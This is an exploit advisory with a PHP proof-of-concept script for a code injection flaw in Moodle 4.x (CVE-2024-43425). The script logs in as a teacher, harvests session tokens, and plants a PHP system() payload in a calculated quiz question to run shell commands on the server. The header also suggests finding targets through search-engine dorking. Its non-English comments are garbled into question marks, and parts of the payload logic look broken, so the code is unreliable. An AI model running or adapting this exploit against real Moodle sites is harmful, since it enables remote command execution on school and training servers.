Moodle 4.x PHP Code Injection

=============================================================================================================================================
| # Title Moodle 4.x PHP Code Injection

=============================================================================================================================================
| # Title : Moodle 4.x PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://moodle.com/moodle-4/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: (PHP Code Injection Vulnerability) in Moodle (CVE-2024-43425). The module executes commands using command injection through the Moodle quiz question feature.

[+] save code as poc.php .

[+] Set Target : line 8 + 9 + 10

[+] USage : php poc.php

[+] PayLoad :

<?php

//CVE-2024-43425
//https://packetstorm.news/files/id/183003/


// ??????? ?????????
$target = "http://example.com"; // ???? Moodle ????????
$username = "teacher";
$password = "password";

// ????? ???????
$cookie_file = tempnam(sys_get_temp_dir(), "cookies");

// ???? ?????? ??? HTTP ??? cURL
function send_request($url, $post_fields = null, $use_cookie = true) {
global $cookie_file;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
if ($use_cookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
}
if ($post_fields) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
}
$response = curl_exec($ch);
if (curl_errno($ch)) {
die("??? ?? cURL: " . curl_error($ch) . "\n");
}
curl_close($ch);
return $response;
}

// 1. ?????? ??? `logintoken`
$login_page = send_request("$target/login/index.php", null, false);
preg_match('/name="logintoken" value="(.*?)"/', $login_page, $matches);
$logintoken = $matches[1] ?? die("? ??? ?? ?????? ??? logintoken\n");

// 2. ????? ??????
$login_data = [
"username" => $username,
"password" => $password,
"logintoken" => $logintoken
];
$response = send_request("$target/login/index.php", $login_data);

// ?????? ?? ???? ????? ??????
if (strpos($response, "dashboard") === false) {
die("? ??? ????? ??????!\n");
}

// 3. ?????? ??? `sesskey`
$dashboard = send_request("$target/my/");
preg_match('/"sesskey":"(.*?)"/', $dashboard, $matches);
$sesskey = $matches[1] ?? die("? ??? ?? ?????? ??? sesskey\n");

// 4. ??????? `courseContextId`
preg_match('/data-contextid="(\d+)"/', $dashboard, $matches);
$courseContextId = $matches[1] ?? die("? ??? ?? ?????? ??? courseContextId\n");

// 5. ????? ?????? ?? ??????? (Payload)
$payload = "<p><?php system(escapeshellarg(\$_GET['a'] ?? 'id')); ?></p>";
$question_data = [
"category" => "$courseContextId,1",
"sesskey" => $sesskey,
"qtype" => "calculated",
"name" => "exploit",
"questiontext[text]" => $payload,
"questiontext[format]" => "1",
"submitbutton" => "Save changes"
];
send_request("$target/question/question.php", $question_data);

// 6. ????? ??????? ??? ????? GET
$cmd = $_GET['a'] ?? 'id';
$response = send_request("$target/question/preview.php?a=" . urlencode($cmd));

// ??? ???????
echo "? ????? ???????:\n";
echo htmlspecialchars($response);

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================